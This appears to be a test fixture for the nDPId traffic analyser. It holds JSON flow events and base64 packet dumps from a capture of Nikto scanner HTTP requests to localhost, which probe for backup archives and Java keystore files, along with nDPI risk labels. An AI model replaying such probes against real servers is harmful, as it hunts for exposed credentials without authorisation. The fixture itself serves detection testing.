-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277046,"pkt":"AAAAAAAAAAAAAAAACABFAADBTDZAAEAG7\/5\/AAABfwAAAcNuH5C8OnRaQfn7gYAYAED+tQAAAQEICp1m\/F6dZvxeR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277048,"pkt":"AAAAAAAAAAAAAAAACABFAADBa4BAAEAG0LR\/AAABfwAAAcNwH5C2s1MRi3VVO4AYAED+tQAAAQEICp1m\/GCdZvxfR0VUIC8wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":244,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277048,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277049,"pkt":"AAAAAAAAAAAAAAAACABFAADEjgBAAEAGrjF\/AAABfwAAAcNyH5D9QLWRKHRYjoAYAED+uAAAAQEICp1m\/GGdZvxhR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277049,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277050,"pkt":"AAAAAAAAAAAAAAAACABFAADEqilAAEAGkgh\/AAABfwAAAcN0H5AfdZJKMNG2kYAYAED+uAAAAQEICp1m\/GKdZvxiR0VUIC8xMjcuMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277050,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277051,"pkt":"AAAAAAAAAAAAAAAACABFAADFD2RAAEAGLM1\/AAABfwAAAcN2H5CQvDcOP8imdIAYAED+uQAAAQEICp1m\/GOdZvxjR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":247,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277051,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277054,"pkt":"AAAAAAAAAAAAAAAACABFAADFMyBAAEAGCRF\/AAABfwAAAcN4H5CwJQty\/UTYeoAYAED+uQAAAQEICp1m\/GadZvxmR0VUIC8xMjdfMF8wXzEuamtzIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277054,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277055,"pkt":"AAAAAAAAAAAAAAAACABFAADBVOZAAEAG505\/AAABfwAAAcN6H5D0fGyVu01Ol4AYAED+tQAAAQEICp1m\/GedZvxnR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277055,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277057,"pkt":"AAAAAAAAAAAAAAAACABFAADBgcdAAEAGum1\/AAABfwAAAcN8H5AHG7m2UJwwhYAYAED+tQAAAQEICp1m\/GmdZvxpR0VUIC8xMjcuMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277057,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277058,"pkt":"AAAAAAAAAAAAAAAACABFAADB8E5AAEAGS+Z\/AAABfwAAAcN+H5BxG8g961ERj4AYAED+tQAAAQEICp1m\/GqdZvxqR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277058,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277060,"pkt":"AAAAAAAAAAAAAAAACABFAADB8w9AAEAGSSV\/AAABfwAAAcOAH5AJpMt9MSZkIYAYAED+tQAAAQEICp1m\/GydZvxsR0VUIC8xMjcuMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277060,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 